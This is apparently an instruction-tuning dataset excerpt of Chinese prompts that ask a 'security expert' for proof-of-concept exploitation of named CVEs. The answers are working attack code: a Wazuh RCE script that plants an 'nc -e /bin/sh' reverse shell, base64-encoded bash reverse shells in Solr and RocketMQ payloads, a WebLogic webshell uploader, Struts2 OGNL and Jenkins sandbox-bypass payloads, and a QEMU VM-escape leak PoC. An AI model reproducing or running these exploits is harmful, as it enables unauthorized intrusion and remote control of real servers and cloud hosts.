  175. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Wazuh Manager 代码执行漏洞CVE-2021-26814\n漏洞描述:Wazuh 从4.0.0到4.0.3的 Wazuh API允许经过身份验证的用户通过/manager/files URI以管理权限执行任意代码。\n影响版本:``` Wazuh Manager  v.4.0.0-4.0.3 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-26814\n【POC利用方法】\n1. Wazuh Manager  v.4.0.0-4.0.3\n2. PoC.py [-h] -user USERNAME -pwd PASSWORD -lip SRCIP -lport SRCPORT -tip\n              DESTIP -tport DESTPORT\n3. # Exploit Title: Wazuh 4.0.3 API RCE\n# Author: WickdDavid (Davide Meacci)\n# Date: 2021-01-01\n# Vendor Homepage: https://github.com/wazuh/wazuh\n# Version : 4.0.3\n\n\nimport requests\nimport sys\nimport argparse\nimport time\nimport json\nfrom urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\n\nparser = argparse.ArgumentParser(description='Wazuh-manager authenticated RCE by WickdDavid')\nparser.add_argument('-user', dest='username',required=True,\n                    help='wazuh API username')\nparser.add_argument('-pwd', dest='password',required=True,\n                    help='wazuh API password')\nparser.add_argument('-lip', dest='srcip',required=True,\n                    help='listening server')\nparser.add_argument('-lport', dest='srcport',required=True,\n                    help='listening port')\nparser.add_argument('-tip', dest='destip',required=True,\n                    help='target server ip (wazuh API)')\nparser.add_argument('-tport', dest='destport',required=True,\n                    help='target server port (wazuh API)')\n\n\nargs = parser.parse_args()\n\n# executed payload may be changed here\n\nexec_payload = \"\"\"\nimport os #:l\nos.system(\"nc %s %s -e /bin/sh\") #:l\n\"\"\" % (args.srcip, args.srcport)\n\n\nconfig_payload = { \"drop_privileges\": False }\n\n\nproxies = {\n\t\"http\":\"http://127.0.0.1:8080\",\n\t\"https\":\"https://127.0.0.1:8080\"\n}\n\ntarget = \"https://%s:%s\" % (args.destip,args.destport)\nauth_token = \"\"\npath_traversal = \"etc/lists/../../../../..\"\nheaders = {}\n\n# step 1 - obtaining auth token\n\nr = requests.get(\"%s/security/user/authenticate?raw=true\" % target, auth=(args.username, args.password),verify=False)\n\nif(r.status_code == 200):\n    auth_token = r.text\n    headers[\"Authorization\"] = \"Bearer %s\" % auth_token\nelse:\n    print(\"[!] No auth code recovered. Check username and password\")\n    exit(1)\n\n# step 2 - Privilege Escalation on API (not implemented)\n\n\n# step 3 - Save files to be restored later\n\nfile_to_overwrite = \"/var/ossec/api/scripts/wazuh-apid.py\"\nprint(\"[+] Saving files to restore later...\")\nr = requests.get(\"%s/manager/files?path=%s%s\" % (target,path_traversal,file_to_overwrite), headers = headers, verify=False)\nf = open(\"backup.py\",\"w\")\nf.write(json.loads(r.text)[\"contents\"])\nf.close()\ntime.sleep(1)\n\n# step 4 - Local Privilege Escalation \n\nprint(\"[+] Changing API config to run as root...\")\nr = requests.put(\"%s/manager/api/config\" % target, headers = headers, json = config_payload, verify=False)\ntime.sleep(1)\n\n# step 5 - Restart server (now api service runs as root) \n\nprint(\"[+] Restarting server...\")\nr = requests.put(\"%s/manager/restart?wait_for_complete=true\" % target, headers = headers,verify=False)\n#print(r.text)\n\ndata = {\"title\":\"Bad Request\"}\nwhile \"title\" in data and \"Bad request\" in data[\"title\"]:\n    time.sleep(5)\n    try:\n        r = requests.get(\"%s/manager/status\" % target, headers = headers, verify=False)\n        #print(r.text)\n        data = json.loads(r.text)\n    except:\n        continue\n\n# step 6 - Overwrite /var/ossec/api/scripts/wazuh-apid.py with malicious python payload\n\nprint(\"[+] Uploading payload...\")\nr = requests.put(\"%s/manager/files?path=%s%s&overwrite=true\" % (target,path_traversal,file_to_overwrite), headers = headers, data = exec_payload, verify=False)\n#print(r.text)\ntime.sleep(1)\n\n# step 7 - Restart server (now malicious payload will be run by the server)\n\n\nprint(\"[+] Restarting API service for the last time...\")\nr = requests.put(\"%s/manager/restart?wait_for_complete=true\" % target, headers = headers,verify=False)\n#print(r.text)\n\ndata = {\"title\":\"Bad Request\"}\nwhile \"title\" in data and \"Bad request\" in data[\"title\"]:\n    time.sleep(5)\n    try:\n        r = requests.get(\"%s/manager/status\" % target, headers = headers, verify=False)\n        #print(r.text)\n        data = json.loads(r.text)\n    except:\n        continue\n\n\nprint(\"[+] Payload executed, check your shell now.\")\nprint(\"[+] Remember to restore changed file (check local backup file)\")\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Wazuh Manager 代码执行漏洞 CVE-2021-26814.md"}
    176. 

  176. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr 远程执行漏洞 CVE-2019-0193\n漏洞描述:2019 年 08 月 01 日,Apache Solr 官方发布预警,Apache Solr DataImport 功能 在开启 Debug 模式时,可以接收来自请求的”dataConfig”参数,这个参数的功能与`data-config.xml` 一样,不过是在开启 Debug 模式时方便通过此参数进行调试,并且 Debug 模式的开启是通过参数传入的。在 `dataConfig` 参数中可以包含 script 恶意脚本导致远程代码执行。 参考阅读: - [apache solr远程代码执行漏洞(cve-2019-0193)](https://blog.csdn.net/whatday/article/details/106959989?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-4.channel_param&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromBaidu-4.channel_param)\n影响版本:``` Apache Solr < 8.2.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2019-0193\n【POC利用方法】\n1. Apache Solr < 8.2.0\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/solr/CVE-2019-0193\ndocker-compose build\ndocker-compose up -d\n\n# 创建一个solr核心test\ndocker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db\n3. <dataConfig>\n  <dataSource type=\"URLDataSource\"/>\n  <script><![CDATA[\n          function poc(){ java.lang.Runtime.getRuntime().exec(\"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eHgueHh4Lnh4eC54eHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}\");\n          }\n  ]]></script>\n  <document>\n    <entity name=\"stackoverflow\"\n            url=\"https://stackoverflow.com/feeds/tag/solr\"\n            processor=\"XPathEntityProcessor\"\n            forEach=\"/feed\"\n            transformer=\"script:poc\" />\n  </document>\n</dataConfig>\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Solr 远程执行漏洞 CVE-2019-0193.md"}
    177. 

  177. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Struts2 S2-015 远程代码执行漏洞\n漏洞描述:漏洞产生于配置了 Action 通配符 *,并将其作为动态值时,解析时会将其内容执行 OGNL 表达式,例如: ``` <package name=\"S2-015\" extends=\"struts-default\"> <action name=\"*\" class=\"com.demo.action.PageAction\"> <result>/{1}.jsp</result> </action> </package> ``` 上述配置能让我们访问 name.action 时使用 name.jsp 来渲染页面,但是在提取 name 并解析时,对其执行了 OGNL 表达式解析,所以导致命令执行。在实践复现的时候发现,由于 name 值的位置比较特殊,一些特殊的字符如 / \" \\ 都无法使用(转义也不行),所以在利用该点进行远程命令执行时一些带有路径的命令可能无法执行成功。 还有需要说明的就是在 Struts 2.3.14.1 - Struts 2.3.14.2 的更新内容中,删除了 SecurityMemberAccess 类中的 setAllowStaticMethodAccess 方法,因此在 2.3.14.2 版本以后都不能直接通过 `#_memberAccess['allowStaticMethodAccess']=true` 来修改其值达到重获静态方法调用的能力。 漏洞详情: - http://struts.apache.org/docs/s2-015.html\n影响版本:影响版本: 2.0.0 - 2.3.14.2\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. <package name=\"S2-015\" extends=\"struts-default\">\n    <action name=\"*\" class=\"com.demo.action.PageAction\">\n        <result>/{1}.jsp</result>\n    </action>\n</package>\n2. docker-compose build\ndocker-compose up -d\n3. #context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true)\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Struts2 S2-015 远程代码执行漏洞.md"}
    178. 

  178. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic 任意文件上传漏洞 CVE-2018-2894\n漏洞描述:Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在“生产模式”下默认不开启,所以该漏洞有一定限制。 利用该漏洞,可以上传任意jsp文件,进而获取服务器权限。 参考链接: - http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html - https://mp.weixin.qq.com/s/y5JGmM-aNaHcs_6P9a-gRQ - https://xz.aliyun.com/t/2458\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2018-2894\n【POC利用方法】\n1. docker-compose up -d\n2. #!/usr/bin/env python\n# coding:utf-8\n# Build By LandGrey\n\nfrom __future__ import print_function\nfrom builtins import str\nimport re\nimport sys\nimport time\nimport argparse\nimport requests\nimport traceback\nimport xml.etree.ElementTree as ET\n\n\ndef get_current_work_path(host):\n    geturl = host + \"/ws_utc/resources/setting/options/general\"\n    ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}\n    values = []\n    try:\n        request = requests.get(geturl)\n        if request.status_code == 404:\n            exit(\"[-] {}  don't exists CVE-2018-2894\".format(host))\n        elif \"Deploying Application\".lower() in request.text.lower():\n            print(\"[*] First Deploying Website Please wait a moment ...\")\n            time.sleep(20)\n            request = requests.get(geturl, headers=ua)\n        if \"</defaultValue>\" in request.content:\n            root = ET.fromstring(request.content)\n            value = root.find(\"section\").find(\"options\")\n            for e in value:\n                for sub in e:\n                    if e.tag == \"parameter\" and sub.tag == \"defaultValue\":\n                        values.append(sub.text)\n    except requests.ConnectionError:\n        exit(\"[-] Cannot connect url: {}\".format(geturl))\n    if values:\n        return values[0]\n    else:\n        print(\"[-] Cannot get current work path\\n\")\n        exit(request.content)\n\n\ndef get_new_work_path(host):\n    origin_work_path = get_current_work_path(host)\n    works = \"/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css\"\n    if \"user_projects\" in origin_work_path:\n        if \"\\\\\" in origin_work_path:\n            works = works.replace(\"/\", \"\\\\\")\n            current_work_home = origin_work_path[:origin_work_path.find(\"user_projects\")] + \"user_projects\\\\domains\"\n            dir_len = len(current_work_home.split(\"\\\\\"))\n            domain_name = origin_work_path.split(\"\\\\\")[dir_len]\n            current_work_home += \"\\\\\" + domain_name + works\n        else:\n            current_work_home = origin_work_path[:origin_work_path.find(\"user_projects\")] + \"user_projects/domains\"\n            dir_len = len(current_work_home.split(\"/\"))\n            domain_name = origin_work_path.split(\"/\")[dir_len]\n            current_work_home += \"/\" + domain_name + works\n    else:\n        current_work_home = origin_work_path\n        print(\"[*] cannot handle current work home dir: {}\".format(origin_work_path))\n    return current_work_home\n\n\ndef set_new_upload_path(host, path):\n    data = {\n        \"setting_id\": \"general\",\n        \"BasicConfigOptions.workDir\": path,\n        \"BasicConfigOptions.proxyHost\": \"\",\n        \"BasicConfigOptions.proxyPort\": \"80\"}\n    request = requests.post(host + \"/ws_utc/resources/setting/options\", data=data, headers=headers)\n    if \"successfully\" in request.content:\n        return True\n    else:\n        print(\"[-] Change New Upload Path failed\")\n        exit(request.content)\n\n\ndef upload_webshell(host, uri):\n    set_new_upload_path(host, get_new_work_path(host))\n    files = {\n        \"ks_edit_mode\": \"false\",\n        \"ks_password_front\": password,\n        \"ks_password_changed\": \"true\",\n        \"ks_filename\": (\"360sglab.jsp\", upload_content)\n    }\n\n    request = requests.post(host + uri, files=files)\n    response = request.text\n    match = re.findall(\"<id>(.*?)</id>\", response)\n    if match:\n        tid = match[-1]\n        shell_path = host + \"/ws_utc/css/config/keystore/\" + str(tid) + \"_360sglab.jsp\"\n        if upload_content in requests.get(shell_path, headers=headers).content:\n            print(\"[+] {} exists CVE-2018-2894\".format(host))\n            print(\"[+] Check URL: {} \".format(shell_path))\n        else:\n            print(\"[-] {}  don't exists CVE-2018-2894\".format(host))\n    else:\n        print(\"[-] {}  don't exists CVE-2018-2894\".format(host))\n\n\nif __name__ == \"__main__\":\n    start = time.time()\n    password = \"360sglab\"\n    url = \"/ws_utc/resources/setting/keystore\"\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"-t\", dest='target', default=\"http://127.0.0.1:7001\", type=str,\n                        help=\"target, such as: http://example.com:7001\")\n\n    upload_content = \"360sglab test\"\n    headers = {\n        'Content-Type': 'application/x-www-form-urlencoded',\n        'X-Requested-With': 'XMLHttpRequest', }\n\n    if len(sys.argv) == 1:\n        sys.argv.append('-h')\n    args = parser.parse_args()\n    target = args.target\n\n    target = target.rstrip('/')\n    if \"://\" not in target:\n        target = \"http://\" + target\n    try:\n        upload_webshell(target, url)\n    except Exception as e:\n        print(\"[-] Error: \\n\")\n        traceback.print_exc()\n3. - https://mp.weixin.qq.com/s/y5JGmM-aNaHcs_6P9a-gRQ\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Weblogic 任意文件上传漏洞 CVE-2018-2894.md"}
    179. 

  179. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jenkins checkScript 远程命令执行漏洞 CVE-2018-1000861\n漏洞描述:Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。\n影响版本:``` Jenkins version < 2.138 Jenkins build time < 2019-01-28 ```\n网络测绘:``` app=\"Jenkins\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2018-1000861\n【POC利用方法】\n1. Jenkins version < 2.138\nJenkins build time < 2019-01-28\n2. app=\"Jenkins\"\n3. http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript\n?sandbox=true\n&value=public class x {\n  public x(){\n    \"touch /tmp/success\".execute()\n  }\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Jenkins checkScript 远程命令执行漏洞 CVE-2018-1000861.md"}
    180. 

  180. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109\n漏洞描述:2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8,利用复杂度低。建议用户尽快采取措施,对上述漏洞进行防护。\n影响版本:``` WebLogic Server 10.3.6.0.0 WebLogic Server 12.1.3.0.0 WebLogic Server 12.2.1.3.0 WebLogic Server 12.2.1.4.0 WebLogic Server 14.1.1.0.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-2109\n【POC利用方法】\n1. WebLogic Server 10.3.6.0.0\nWebLogic Server 12.1.3.0.0\nWebLogic Server 12.2.1.3.0\nWebLogic Server 12.2.1.4.0\nWebLogic Server 14.1.1.0.0\n2. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/weblogic/CVE-2020-14882\ndocker-compose up -d\n3. java -jar JNDIExploit-v1.11.jar -i xxx.xxx.xxx.xxx (服务器地址)\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109.md"}
    181. 

  181. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache RocketMQ 远程命令执行漏洞 CVE-2023-33246\n漏洞描述:Apache RocketMQ是一个分布式消息平台。 在其5.1.0版本及以前存在一处命令执行漏洞,攻击者通过向其更新配置相关的功能发送指令即可更新任意配置项,并通过配置项中存在的命令注入功能执行任意命令。 参考链接: - https://lists.apache.org/thread/1s8j2c8kogthtpv3060yddk03zq0pxyp - https://github.com/I5N0rth/CVE-2023-33246\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2023-33246\n【POC利用方法】\n1. docker compose up -d\n2. <dependencies>\n    <!-- https://mvnrepository.com/artifact/org.apache.rocketmq/rocketmq-tools -->\n    <dependency>\n        <groupId>org.apache.rocketmq</groupId>\n        <artifactId>rocketmq-tools</artifactId>\n        <version>5.1.0</version>\n    </dependency>\n</dependencies>\n3. import org.apache.rocketmq.tools.admin.DefaultMQAdminExt;\n\nimport java.util.Base64;\nimport java.util.Properties;\n\npublic class Main {\n    private static String getCmd(String ip, String port) {\n        String cmd = \"bash -i >& /dev/tcp/\" + ip + \"/\" + port + \" 0>&1\";\n        String cmdBase = Base64.getEncoder().encodeToString(cmd.getBytes());\n        return \"-c $@|sh . echo echo \\\"\" + cmdBase + \"\\\"|base64 -d|bash -i;\";\n    }\n\n    public static void main(String[] args) throws Exception {\n        String targetHost = \"your-ip\";\n        String targetPort = \"10911\";\n\n        String shellHost = \"your-ip\";\n        String shellPort = \"12345\";\n\n        String targetAddr = String.format(\"%s:%s\",targetHost,targetPort);\n        Properties props = new Properties();\n        props.setProperty(\"rocketmqHome\", getCmd(shellHost,shellPort));\n        props.setProperty(\"filterServerNums\", \"1\");\n        DefaultMQAdminExt admin = new DefaultMQAdminExt();\n        admin.setNamesrvAddr(\"0.0.0.0:12345\");\n        admin.start();\n        admin.updateBrokerConfig(targetAddr, props);\n        Properties brokerConfig = admin.getBrokerConfig(targetAddr);\n        System.out.println(brokerConfig.getProperty(\"rocketmqHome\"));\n        System.out.println(brokerConfig.getProperty(\"filterServerNums\"));\n        admin.shutdown();\n    }\n}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache RocketMQ 远程命令执行漏洞 CVE-2023-33246.md"}
    182. 

  182. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Consul Service API远程命令执行漏洞\n漏洞描述:2018年11月27日,Consul在官方博客中发布了关于Consul工具在特定配置下可能导致远程命令执行(RCE)漏洞的公告,并描述了防护该漏洞的配置方案。 Consul是HashiCorp公司推出的一款开源工具,用于实现分布式系统的服务发现与配置。与其他分布式服务注册与发现的方案相比,Consul提供的方案更为“一站式”。Consul内置了服务注册与发现框架、分布一致性协议实现、健康检查、Key/Value存储、多数据中心方案,不再需要依赖其他工具(例如ZooKeeper等),使用方式也相对简单。 Consul使用Go语言编写,因此具有天然的可移植性(支持Linux、Windows和Mac OS X系统);且安装包中仅包含一个可执行文件,便于部署,可与Docker等轻量级容器无缝配合。 在特定配置下,恶意攻击者可以通过发送精心构造的HTTP请求在未经授权的情况下在Consul服务端远程执行命令。\n影响版本:启用了脚本检查参数(-enable-script-checks)的所有版本\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. #开启脚本检测功能,该功能开启后漏洞才存在\nconsul.exe agent -dev -client <your-target-ip>  -enable-script-checks\n2. http://your-target-ip:port/v1/agent/self\n3. msf6 > search Hashicorp\nmsf6 > use exploit/multi/misc/consul_service_exec\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Consul Service API远程命令执行漏洞.md"}
    183. 

  183. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenSMTPD 远程命令执行漏洞 CVE-2020-7247\n漏洞描述:OpenSMTPD 是面向 unix 操作系统 (BSD, MacOS, GNU/Linux) 的一个 smtp 服务程序,遵循 RFC 5321 SMTP 协议,OpenSMTPD 最初是为 OpenBSD 操作系统开发的,是 OpenBSD 项目的一部分,由于其开源的特性,进而分发到了其他 unix 平台。根据 ISC 许可,该软件可免费供所有人使用和重用。 `CVE-2020-7247` 是 OpenSMTPD 在实现 RFC 5321 的过程中对 发件人/收件人 校验不严而导致的。 2020年01月29日,OpenSMTPD 官方在 github 代码仓库提交了针对 `CVE-2020-7247` 漏洞的修复,修复后对应版本为`OpenSMTPD 6.6.2p1`。 参考链接: - https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt - https://www.exploit-db.com/exploits/47984 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7247 - https://www.anquanke.com/post/id/197689\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-7247\n【POC利用方法】\n1. docker-compose up -d\n2. 220 44dadcc5a6eb ESMTP OpenSMTPD\n3. python3 poc.py your-ip 8825 <command>\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/OpenSMTPD 远程命令执行漏洞 CVE-2020-7247.md"}
    184. 

  184. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:QEMU 虚拟机逃逸漏洞 CVE-2020-14364\n漏洞描述:当地时间8月24日,一个存在于QEMU USB模拟器中的越界读写漏洞(CVE-2020-14364)被公布。 漏洞位于 ./hw/usb/core.c 中,当程序处理来自客户机的USB数据包时,如果在 do_token_in 与 do_token_out中’USBDevice->setup_len’超过了USBDevice->data_buf[4096],则存在问题。 客户机用户可能会使用此漏洞使QEMU进程崩溃,从而导致DoS或在宿主机上以QEMU进程的特权执行任意代码,实现虚拟机逃逸。 攻击者在拥有云环境虚拟机操作系统权限的情况下,便可利用该漏洞获取宿主机权限,进而攻击虚拟机所在资源池所有租户主机,甚至可通过已开通的内网权限攻击管理域系统,风险极高。 本次漏洞的影响范围较广,涉及qemu 1.0 以上的全部版本。\n影响版本:``` Qemu > 1.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-14364\n【POC利用方法】\n1. #include <assert.h>\n#include <fcntl.h>\n#include <inttypes.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <sys/mman.h>\n#include <sys/types.h>\n#include <unistd.h>\n#include <sys/io.h>\n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <errno.h> \n#include <sys/types.h> \n#include <sys/socket.h> \n#include <stdbool.h>\n#include <netinet/in.h> \n\nunsigned char* mmio_mem;\nchar *dmabuf;\nstruct ohci_hcca * hcca;\nstruct EHCIqtd * qtd;\nstruct ohci_ed * ed;\nstruct ohci_td * td;\nchar *setup_buf;\nuint32_t *dmabuf32;\nchar *td_addr;\nstruct EHCIqh * qh;\nstruct ohci_td * td_1;\nchar *dmabuf_phys_addr;\ntypedef struct USBDevice USBDevice;\ntypedef struct USBEndpoint USBEndpoint;\n\nstruct USBEndpoint {\n    uint8_t nr;\n    uint8_t pid;\n    uint8_t type;\n    uint8_t ifnum;\n    int max_packet_size;\n    int max_streams;\n    bool pipeline;\n    bool halted;\n    USBDevice *dev;\n    USBEndpoint *fd;\n    USBEndpoint *bk;\n};\n\nstruct USBDevice {\n    int32_t remote_wakeup;\n    int32_t setup_state;\n    int32_t setup_len;\n    int32_t setup_index;\n    USBEndpoint ep_ctl;\n    USBEndpoint ep_in[15];\n    USBEndpoint ep_out[15];\n};\n\n\ntypedef struct EHCIqh {\n    uint32_t next;                    /* Standard next link pointer */\n    /* endpoint characteristics */\n    uint32_t epchar;\n    /* endpoint capabilities */\n    uint32_t epcap;\n    uint32_t current_qtd;             /* Standard next link pointer */\n    uint32_t next_qtd;                /* Standard next link pointer */\n    uint32_t altnext_qtd;\n    uint32_t token;                   /* Same as QTD token */\n    uint32_t bufptr[5];               /* Standard buffer pointer */\n} EHCIqh;\n\ntypedef struct EHCIqtd {\n    uint32_t next;                    /* Standard next link pointer */\n    uint32_t altnext;                 /* Standard next link pointer */\n    uint32_t token;\n    uint32_t bufptr[5];               /* Standard buffer pointer */\n} EHCIqtd;\n\nuint64_t virt2phys(void* p)\n{\n    uint64_t virt = (uint64_t)p;\n    // Assert page alignment\n    int fd = open(\"/proc/self/pagemap\", O_RDONLY);\n    if (fd == -1)\n        die(\"open\");\n    uint64_t offset = (virt / 0x1000) * 8;\n    lseek(fd, offset, SEEK_SET);\n    uint64_t phys;\n    if (read(fd, &phys, 8 ) != 8)\n        die(\"read\");\n    // Assert page present\n\n    phys = (phys & ((1ULL << 54) - 1)) * 0x1000+(virt&0xfff);\n    return phys;\n}\n\n \n\nvoid die(const char* msg)\n{\n    perror(msg);\n    exit(-1);\n}\n\n \nvoid mmio_write(uint32_t addr, uint32_t value)\n{\n    *((uint32_t*)(mmio_mem + addr)) = value;\n}\n\n \n\nuint64_t mmio_read(uint32_t addr)\n{\n    return *((uint64_t*)(mmio_mem + addr));\n}\n\nvoid init(){\nint mmio_fd = open(\"/sys/devices/pci0000:00/0000:00:05.7/resource0\", O_RDWR | O_SYNC);\n    if (mmio_fd == -1)\n        die(\"mmio_fd open failed\");\n\nmmio_mem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, mmio_fd, 0);\n    if (mmio_mem == MAP_FAILED)\n        die(\"mmap mmio_mem failed\");\n\ndmabuf = mmap(0, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);\n    if (dmabuf == MAP_FAILED)\n        die(\"mmap\");\n    mlock(dmabuf, 0x3000);\nhcca=dmabuf;\ndmabuf32=dmabuf+4;\nqtd=dmabuf+0x200;\nqh=dmabuf+0x100;\nsetup_buf=dmabuf+0x300;\n}\n\nvoid init_state(){\nmmio_write(0x64,0x100);\nmmio_write(0x64,0x4);\nqh->epchar=0x00;\nqh->token=1<<7;\nqh->current_qtd=virt2phys(dmabuf+0x200);\nstruct EHCIqtd * qtd;\nqtd=dmabuf+0x200;\nqtd->token=1<<7 | 2<<8 | 8<<16;\nqtd->bufptr[0]=virt2phys(dmabuf+0x300);\nsetup_buf[6]=0xff;\nsetup_buf[7]=0x0;\ndmabuf32[0]=virt2phys(dmabuf+0x100)+0x2;\nmmio_write(0x28,0x0);\nmmio_write(0x30,0x0);\nmmio_write(0x38,virt2phys(dmabuf));\nmmio_write(0x34,virt2phys(dmabuf));\nmmio_write(0x20,0x11);\n}\n\nvoid set_length(uint16_t len,uint8_t in){\nmmio_write(0x64,0x100);\nmmio_write(0x64,0x4);\nsetup_buf[0]=in;\nsetup_buf[6]=len&0xff;\nsetup_buf[7]=(len>>8)&0xff;\nqh->epchar=0x00;\nqh->token=1<<7;\nqh->current_qtd=virt2phys(dmabuf+0x200);\n\nqtd->token=1<<7 | 2<<8 | 8<<16;\nqtd->bufptr[0]=virt2phys(dmabuf+0x300);\ndmabuf32[0]=virt2phys(dmabuf+0x100)+0x2;\nmmio_write(0x28,0x0);\nmmio_write(0x30,0x0);\nmmio_write(0x38,virt2phys(dmabuf));\nmmio_write(0x34,virt2phys(dmabuf));\nmmio_write(0x20,0x11);\n}\n\nvoid do_copy_read(){\nmmio_write(0x64,0x100);\nmmio_write(0x64,0x4);\n\nqh->epchar=0x00;\nqh->token=1<<7;\nqh->current_qtd=virt2phys(dmabuf+0x200);\nqtd->token=1<<7 | 1<<8 | 0x1f00<<16;\nqtd->bufptr[0]=virt2phys(dmabuf+0x1000);\nqtd->bufptr[1]=virt2phys(dmabuf+0x2000);\ndmabuf32[0]=virt2phys(dmabuf+0x100)+0x2;\nmmio_write(0x28,0x0);\nmmio_write(0x30,0x0);\nmmio_write(0x38,virt2phys(dmabuf));\nmmio_write(0x34,virt2phys(dmabuf));\nmmio_write(0x20,0x11);\n}\n\nint main()\n{\n    init();\n    iopl(3);\n    outw(0,0xc0c0);\n    outw(0,0xc0e0);\n    outw(0,0xc010);\n    outw(0,0xc0a0);\n    sleep(3);\n    init_state();\n    sleep(2);\n    set_length(0x2000,0x80);\n    sleep(2);\n    do_copy_read();\n    sleep(2);\n    struct USBDevice* usb_device_tmp=dmabuf+0x2004;\n    struct USBDevice usb_device;\n    memcpy(&usb_device,usb_device_tmp,sizeof(USBDevice));\n    uint64_t dev_addr=usb_device.ep_ctl.dev;\n    uint64_t *tmp=dmabuf+0x24f4;\n    long long base=*tmp;\n    if(base == 0){\n        printf(\"INIT DOWN,DO IT AGAIN\");\n        return 0;\n}\n    base-=0xee5480-0x2668c0;\n    uint64_t system=base+0x2d9610;\n    puts(\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\");\n    printf(\"LEAK BASE ADDRESS:%llx!\\n\",base);\n    printf(\"LEAK SYSTEM ADDRESS:%llx!\\n\",system);\n    puts(\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\");\n}\n2. [QEMU CVE-2020-14364 POC 视频演示](https://v.qq.com/x/page/w3141fini4b.html)\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/QEMU 虚拟机逃逸漏洞 CVE-2020-14364.md"}
    185. 

